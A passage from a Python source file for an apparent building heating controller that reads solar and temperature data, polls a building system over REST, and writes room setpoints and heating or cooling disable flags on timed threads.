file in the folder\n filename = max(glob(\"export_solar*.csv\"), key = os.path.getmtime)\n logging.info(\"Autodetecting Ilmanet data file: \" + filename)\n except:\n logging.info(\"Failed to autodetect Ilmanet datafile.\")\n logging.info(\"Reading Ilmanet solar data from file: \" + filename)\n self._solar_data = input_functions.get_solar_from_ilmanet(filename)\n\n solar_ignore_dates = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_IGNORE_DATES, \\\n fallback=CONFIG.INPUT_SOLAR_IGNORE_DATES_FALLBACK)\n if solar_ignore_dates:\n logging.info(\"Ignoring dates on solar data\")\n self._solar_data = input_functions.replace_dates_with_today(self._solar_data)\n\n #\n # Loading parameters for temperature data.\n #\n temperatures_from_file = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_FROM_FILE, \\\n fallback=CONFIG.INPUT_TEMP_FROM_FILE_FALLBACK)\n # datafile\n if temperatures_from_file:\n filename = config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_FILENAME, \\\n fallback=CONFIG.INPUT_TEMP_FILENAME_FALLBACK)\n date_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_DATE_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_TEMP_DATE_COLUMN_INDEX_FALLBACK))\n time_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_TIME_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_TEMP_TIME_COLUMN_INDEX_FALLBACK))\n data_index = int(config.get(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_DATA_COLUMN_INDEX, \\\n fallback=CONFIG.INPUT_TEMP_DATA_COLUMN_INDEX_FALLBACK))\n logging.info(\"Reading temperatures from file: \" + filename + \" date index: \" + str(date_index) + \\\n \" time index: \" + str(time_index) + \" data index: \" + \\\n str(data_index))\n self._temperature_data = input_functions.load_data_from_file(filename, date_index, time_index, data_index)\n\n temperature_ignore_dates = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_IGNORE_DATES, \\\n fallback=CONFIG.INPUT_TEMP_IGNORE_DATES_FALLBACK)\n if temperature_ignore_dates:\n logging.info(\"Ignoring dates on temperature data\")\n self._temperature_data = input_functions.replace_dates_with_today(self._temperature_data)\n else:\n # FMI\n self._temperature_data = input_functions.get_temperature_data()\n if self._save_temperatures:\n logging.info(\"Saving temperatures to: \" + self._save_temperatures_filename)\n save_temperatures_to_file(self._solar_data, self._temperature_data, self._save_temperatures_filename)\n # start FMI reading subprocess\n self._reading_FMI.start()\n\n # start other subprocesses\n self._reading_REST.start()\n self._writing_setpoint.start()\n #self._writing_data.start()\n self._starttime = datetime.now()\n\n# process for reading data from REST\nclass read_REST:\n def __init__(self, client: Client, core: Core):\n self._exit = False\n self._client = client\n self._core = core\n\n def stop(self):\n self._exit = True\n\n def start(self):\n self._exit = False\n thread = threading.Thread(target=self._start)\n thread.daemon = True\n thread.start()\n \n def _start(self):\n cycle_length = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_READ_REST_CYCLE, \\\n fallback=CONFIG.TIMINGS_READ_REST_CYCLE_FALLBACK))\n offset = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_READ_REST_OFFSET, \\\n fallback=CONFIG.TIMINGS_READ_REST_OFFSET_FALLBACK))\n process_time = calculate_start_time(cycle_length, offset)\n\n logging.info(\"Reading data started - Cycle length: \" + str(cycle_length) + \" min\")\n\n while True:\n try:\n process_time = delay_process(process_time, cycle_length)\n\n # Exit here blocks 
the process from continuing after exit command has been given,\n # but trends are still being retrieved.\n if self._exit:\n break\n\n filename = config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_OUTPUT_FILENAME, \\\n fallback=CONFIG.GENERAL_OUTPUT_FILENAME_FALLBACK)\n\n logging.info(\"Reading data from system...\")\n data = self._client.byid_all()\n write_output(filename, data)\n logging.info(\" Reading data complete\")\n\n except Exception as e:\n logging.error(\"Reading data error\")\n logging.error(str(e))\n\n# process for getting data from FMI\nclass read_FMI:\n def __init__(self, core: Core):\n self._exit = False\n self._core = core\n\n def stop(self):\n self._exit = True\n\n def start(self):\n self._exit = False\n thread = threading.Thread(target=self._start)\n thread.daemon = True\n thread.start()\n\n def _start(self):\n cycle_length = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_READ_FMI_CYCLE, \\\n fallback=CONFIG.TIMINGS_READ_FMI_CYCLE_FALLBACK))\n offset = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_READ_FMI_OFFSET, \\\n fallback=CONFIG.TIMINGS_READ_FMI_OFFSET_FALLBACK))\n process_time = calculate_start_time(cycle_length, offset)\n\n logging.info(\"Reading FMI temperature data started - Cycle length: \" + str(cycle_length) + \" min\")\n\n while True:\n try:\n process_time = delay_process(process_time, cycle_length)\n\n if self._exit:\n break\n\n logging.info(\"Getting FMI temperature data...\")\n temperature_data = input_functions.get_temperature_data()\n self._core.set_temperatures(temperature_data)\n logging.info(\" Getting FMI temperature data complete\")\n\n except Exception as e:\n logging.error(\"Getting FMI temperature data error\")\n logging.error(str(e))\n\n\n# process for writing data to REST\nclass write_data:\n def __init__(self, client: Client, core: Core):\n self._exit = False\n self._client = client\n self._core = core\n\n def stop(self):\n self._exit = True\n\n def start(self):\n self._exit = False\n thread = threading.Thread(target=self._start)\n thread.daemon = True\n thread.start()\n\n def _start(self):\n cycle_length = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_WRITE_DATA_CYCLE, \\\n fallback=CONFIG.TIMINGS_WRITE_DATA_CYCLE_FALLBACK))\n offset = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_WRITE_DATA_OFFSET, \\\n fallback=CONFIG.TIMINGS_WRITE_DATA_OFFSET_FALLBACK))\n process_time = calculate_start_time(cycle_length, offset)\n\n solar_ignore_dates = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_IGNORE_DATES, \\\n fallback=CONFIG.INPUT_SOLAR_IGNORE_DATES_FALLBACK)\n solar_from_file = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_SOLAR_FROM_FILE, \\\n fallback=CONFIG.INPUT_SOLAR_FROM_FILE_FALLBACK)\n\n temperatures_ignore_dates = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_IGNORE_DATES, \\\n fallback=CONFIG.INPUT_TEMP_IGNORE_DATES_FALLBACK)\n temperatures_from_file = config.getboolean(CONFIG.INPUT_CATEGORY, CONFIG.INPUT_TEMP_FROM_FILE, \\\n fallback=CONFIG.INPUT_TEMP_FROM_FILE_FALLBACK)\n \n logging.info(\"Writing temperature and solar started - Cycle length: \" + str(cycle_length) + \" min\")\n\n while True:\n try:\n process_time = delay_process(process_time, cycle_length)\n\n if self._exit:\n break\n\n solar_data = self._core.get_solar()\n temperature_data = self._core.get_temperatures()\n\n logging.info(\"Writing temperature and solar data to system...\")\n self._process_data(solar_data, temperature_data, temperatures_ignore_dates, temperatures_from_file, \\\n solar_ignore_dates, 
solar_from_file)\n logging.info(\" Writing temperature and solar data complete\")\n\n except Exception as e:\n logging.error(\"Writing temperature and solar data error\")\n logging.error(str(e))\n\n # writing function\n def _process_data(self, solar_data: list, temperature_data: list, temperatures_ignore_dates: bool, \\\n temperatures_from_file: bool, solar_ignore_dates: bool, \\\n solar_from_file: bool):\n now = datetime.now()\n data = []\n\n if (solar_data != None):\n for row in solar_data:\n if (now.date() == row[0].date() or (solar_ignore_dates and solar_from_file)):\n if (now.hour == row[0].hour):\n data.append((SOLAR_POWER, row[1]))\n break\n \n if (temperature_data != None):\n for row in temperature_data:\n if (now.date() == row[0].date() or (temperatures_ignore_dates and temperatures_from_file)):\n if (now.hour == row[0].hour):\n data.append((OUTSIDE_TEMPERATURE, row[1]))\n break\n\n self._client.writebyid_multiple(data)\n\n# process for writing setpoint\nclass write_setpoint:\n def __init__(self, client: Client, core: Core):\n self._exit = False\n self._client = client\n self._core = core\n\n def stop(self):\n self._exit = True\n\n def start(self):\n self._exit = False\n thread = threading.Thread(target=self._start)\n thread.daemon = True\n thread.start()\n\n def _start(self):\n time_horizon = int(config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_TIME_HORIZON, \\\n fallback=CONFIG.GENERAL_TIME_HORIZON_FALLBACK))\n setpoint_minimum = float(config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_SETPOINT_MINIMUM, \\\n fallback=CONFIG.GENERAL_SETPOINT_MINIMUM_FALLBACK))\n setpoint_maximum = float(config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_SETPOINT_MAXIMUM, \\\n fallback=CONFIG.GENERAL_SETPOINT_MAXIMUM_FALLBACK))\n\n cycle_length = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_WRITE_SETPOINT_CYCLE, \\\n fallback=CONFIG.TIMINGS_WRITE_SETPOINT_CYCLE_FALLBACK))\n offset = int(config.get(CONFIG.TIMINGS_CATEGORY, CONFIG.TIMINGS_WRITE_SETPOINT_OFFSET, \\\n fallback=CONFIG.TIMINGS_WRITE_SETPOINT_OFFSET_FALLBACK))\n process_time = calculate_start_time(cycle_length, offset)\n\n logging.info(\"Writing setpoint started - Cycle length: \" + str(cycle_length) + \" min\")\n\n\n heating_off_at_hour = int(config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_HEATING_OFF_AT_HOUR, \\\n fallback=CONFIG.GENERAL_HEATING_OFF_AT_HOUR_FALLBACK))\n heating_is_off = False\n\n while True:\n try:\n process_time = delay_process(process_time, cycle_length)\n\n if self._exit:\n break\n\n solar_data = self._core.get_solar()\n temperature_data = self._core.get_temperatures()\n\n logging.info(\"Getting room and air temperature from system...\")\n input_data = list()\n input_data.append(ROOM_TEMPERATURE)\n input_data.append(AIR_TEMPERATURE)\n\n data = json.loads(self._client.byid_multiple(input_data))\n\n room_temperature = float(get_value(data, ROOM_TEMPERATURE))\n air_temperature = float(get_value(data, AIR_TEMPERATURE))\n logging.info(\" Temperatures retrieved, room: \" + str(room_temperature) + \\\n \" air: \" + str(air_temperature))\n \n logging.info(\"Calculating new setpoint...\")\n setpoint = calculate_setpoint(room_temperature, solar_data, temperature_data, \\\n time_horizon, air_temperature)\n logging.info(\" Calculating new setpoint complete: \" + str(setpoint))\n\n if (setpoint < setpoint_minimum):\n setpoint = setpoint_minimum\n elif (setpoint > setpoint_maximum):\n setpoint = setpoint_maximum\n\n output = []\n output.append((ROOM_SETPOINT, setpoint))\n #output.append((\"External Control\", 
1))\n\n if (datetime.now().hour == heating_off_at_hour and heating_is_off != True \\\n and is_heating_control_allowed()):\n logging.info(\"Turning heating/cooling external control on.\")\n output.append((\"B4023 Heating Disabled\", 1))\n output.append((\"B4023 Cooling Disabled\", 1))\n #output.append((\"External Control\", 1))\n heating_is_off = True\n\n #if ((is_heating_control_allowed() == True)):\n #output.append((\"External Control\", 1))\n #time.sleep(840)\n\n if (is_heating_control_allowed() != True):\n if (heating_is_off == True):\n logging.info(\"Turning heating/control external control off - outside allowed time range\")\n heating_is_off = False\n output.append((\"B4023 Heating Disabled\", 0))\n output.append((\"B4023 Cooling Disabled\", 0))\n #output.append((\"External Control\", 0))\n\n if (heating_is_off and is_heating_control_allowed() and turn_on_heating( \\\n room_temperature, \\\n solar_data, \\\n temperature_data, \\\n time_horizon, \\\n air_temperature)):\n logging.info(\"Turning heating/control external control off - manual call\")\n heating_is_off = False\n output.append((\"B4023 Heating Disabled\", 0))\n output.append((\"B4023 Cooling Disabled\", 1))\n #output.append((\"External Control\", 0))\n\n logging.info(\"Writing new setpoint to system: \" + str(setpoint))\n self._client.writebyid_multiple(output)\n logging.info(\" Writing new setpoint complete\")\n\n except Exception as e:\n logging.error(\"Writing setpoint error\")\n logging.error(str(e))\n\n\n# return 'value' for target 'id' \ndef get_value(data: list, target: str):\n for i in range(len(data)):\n if (data[i][\"id\"] == target):\n return data[i][\"value\"]\n \n return None\n\n\n# calculates the time for first cycle minus cycle length\ndef calculate_start_time(offset: int, seconds: int):\n starttime = datetime.now()\n\n minutes = 0\n while (starttime.minute >= minutes):\n minutes += offset\n\n minutes -= offset\n return starttime.replace(minute=minutes, second=seconds, microsecond=0)\n\n# sleep until next cycle\ndef delay_process(process_time: datetime, cycle_length: int):\n while (process_time < datetime.now()):\n process_time = process_time + timedelta(minutes=cycle_length)\n\n time.sleep((process_time - datetime.now()).total_seconds())\n return process_time\n\n# saves temperature (and solar) data to a file\n# only used when FMI reading is live\ndef save_temperatures_to_file(solar: list, data: list, filename: str):\n _solar = \"NaN\"\n now = datetime.now()\n\n if (solar != None):\n for row in solar:\n if (now.date() == row[0].date()):\n if (now.hour == row[0].hour):\n _solar = row[1]\n break\n\n # headers\n if not (os.path.exists(filename)):\n with open(filename, \"w\") as data_file:\n data_file.write(\"Date,Record Time,0 Temp Time,Solar Radiation,0 Temp\")\n\n for x in range(len(data) - 1):\n data_file.write(\",+\" + str(x + 1))\n data_file.write(\"\\n\")\n\n with open(filename, \"a\") as data_file:\n data_file.write(data[0][0].strftime(\"%d/%m/%Y\")) # date\n data_file.write(datetime.now().strftime(\",%H:%M:%S\")) # record time\n data_file.write(data[0][0].strftime(\",%H:%M:%S\")) # 0 temp time\n data_file.write(\",\"+_solar)\n\n for x in data:\n data_file.write(\",\" + x[1])\n data_file.write(\"\\n\")\n\n\ndef write_output(filename: str, input_data: str):\n data = json.loads(input_data)\n\n # headers\n if not (os.path.exists(filename)):\n with open(filename, \"w\") as data_file:\n data_file.write(\"Date,Time\")\n for x in range(len(data)):\n data_file.write(\",\" + data[x][\"id\"])\n 
data_file.write(\"\\n\")\n\n with open(filename, \"a\") as data_file:\n _datetime = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\").split()\n data_file.write(_datetime[0] + \",\" + _datetime[1])\n for x in range(len(data)):\n data_file.write(\",\" + data[x][\"value\"])\n data_file.write(\"\\n\")\n\n\ndef is_heating_control_allowed():\n time_range = config.get(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_HEATING_CONTROL_HOURS, \\\n fallback=CONFIG.GENERAL_HEATING_CONTROL_HOURS_FALLBACK) \\\n .split(\"-\")\n heating_control_allowed = config.getboolean(CONFIG.GENERAL_CATEGORY, CONFIG.GENERAL_HEATING_CONTROL_ALLOWED, \\\n fallback=CONFIG.GENERAL_HEATING_CONTROL_ALLOWED_FALLBACK) \n\n current_hour = datetime.now().hour\n start_hour = int(time_range[0])\n end_hour = int(time_range[1])\n\n if (heating_control_allowed):\n if (start_hour == end_hour):\n return True\n elif (current_hour >= start_hour and start_hour > end_hour):\n return True\n elif (current_hour < end_hour and start_hour > end_hour):\n return True\n elif (current_hour >= start_hour and current_hour < end_hour):\n return True\n else:\n return False\n\n","sub_path":"project_B4023/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":25654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}